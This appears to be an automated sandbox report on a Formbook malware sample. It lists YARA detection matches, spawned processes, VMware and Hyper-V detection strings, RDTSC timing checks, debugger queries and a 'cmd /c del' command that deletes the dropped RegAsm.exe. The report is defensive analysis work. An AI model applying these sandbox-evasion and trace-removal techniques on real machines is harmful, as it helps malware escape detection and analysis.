Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: NQQWym075C.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/0@15/8

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_01

Source: NQQWym075C.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NQQWym075C.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: NQQWym075C.exe	Virustotal: Detection: 30%
Source: NQQWym075C.exe	ReversingLabs: Detection: 48%

Source: C:\Users\user\Desktop\NQQWym075C.exe

File read: C:\Users\user\Desktop\NQQWym075C.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'	Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: NQQWym075C.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NQQWym075C.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, wlanext.exe, 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp
Source:	Binary string: RegAsm.pdb source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, wlanext.exe, cscript.exe
Source:	Binary string: wlanext.pdb source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp
Source:	Binary string: RegAsm.pdb4 source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
Source:	Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417141 pushfd ; ret	2_2_00417149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B375 push eax; ret	2_2_0041B3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B3C2 push eax; ret	2_2_0041B3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B3CB push eax; ret	2_2_0041B432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419BB1 push cs; iretd	2_2_00419BBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406420 push ecx; ret	2_2_0040645A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B42C push eax; ret	2_2_0041B432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419CAC push esp; ret	2_2_00419CAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415D49 push 0000004Ah; retf	2_2_00415D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0306D0D1 push ecx; ret	2_2_0306D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00417141 pushfd ; ret	5_2_00417149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B375 push eax; ret	5_2_0041B3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B3C2 push eax; ret	5_2_0041B3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B3CB push eax; ret	5_2_0041B432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419BB1 push cs; iretd	5_2_00419BBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406420 push ecx; ret	5_2_0040645A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B42C push eax; ret	5_2_0041B432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419CAC push esp; ret	5_2_00419CAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00415D49 push 0000004Ah; retf	5_2_00415D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F4D0D1 push ecx; ret	5_2_02F4D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0376D0D1 push ecx; ret	6_2_0376D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B375 push eax; ret	6_2_0325B3C8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03259BB1 push cs; iretd	6_2_03259BBC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B3C2 push eax; ret	6_2_0325B3C8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B3CB push eax; ret	6_2_0325B432
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03257141 pushfd ; ret	6_2_03257149
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03255D49 push 0000004Ah; retf	6_2_03255D4C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03246420 push ecx; ret	6_2_0324645A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_0325B42C push eax; ret	6_2_0325B432
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 6_2_03259CAC push esp; ret	6_2_03259CAD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 10_2_047ED0D1 push ecx; ret	10_2_047ED0E4

Source: initial sample

Static PE information: section name: .text entropy: 7.85956112401

Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000032485C4 second address: 00000000032485CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000324894E second address: 0000000003248954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000029685C4 second address: 00000000029685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 000000000296894E second address: 0000000002968954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\NQQWym075C.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Source: C:\Users\user\Desktop\NQQWym075C.exe	Window / User API: threadDelayed 1771			Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Window / User API: threadDelayed 1364			Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5256	Thread sleep time: -35420s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6332	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 1932	Thread sleep count: 233 > 30	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5520	Thread sleep count: 1364 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 4012	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000003.00000000.258002890.000000000F5C0000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.251807109.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.500819308.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: wlanext.exe, 00000006.00000002.485879155.00000000034BE000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.252038258.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000002.500867105.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.239692433.0000000004DF3000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\NQQWym075C.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,

2_2_03059A00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D131B mov eax, dword ptr fs:[00000030h]	2_2_030D131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301DB40 mov eax, dword ptr fs:[00000030h]	2_2_0301DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8B58 mov eax, dword ptr fs:[00000030h]	2_2_030E8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301F358 mov eax, dword ptr fs:[00000030h]	2_2_0301F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0301DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03043B7A mov eax, dword ptr fs:[00000030h]	2_2_03043B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03043B7A mov eax, dword ptr fs:[00000030h]	2_2_03043B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D138A mov eax, dword ptr fs:[00000030h]	2_2_030D138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CD380 mov ecx, dword ptr fs:[00000030h]	2_2_030CD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03021B8F mov eax, dword ptr fs:[00000030h]	2_2_03021B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03021B8F mov eax, dword ptr fs:[00000030h]	2_2_03021B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042397 mov eax, dword ptr fs:[00000030h]	2_2_03042397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304B390 mov eax, dword ptr fs:[00000030h]	2_2_0304B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]	2_2_03044BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]	2_2_03044BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]	2_2_03044BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E5BA5 mov eax, dword ptr fs:[00000030h]	2_2_030E5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030953CA mov eax, dword ptr fs:[00000030h]	2_2_030953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030953CA mov eax, dword ptr fs:[00000030h]	2_2_030953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
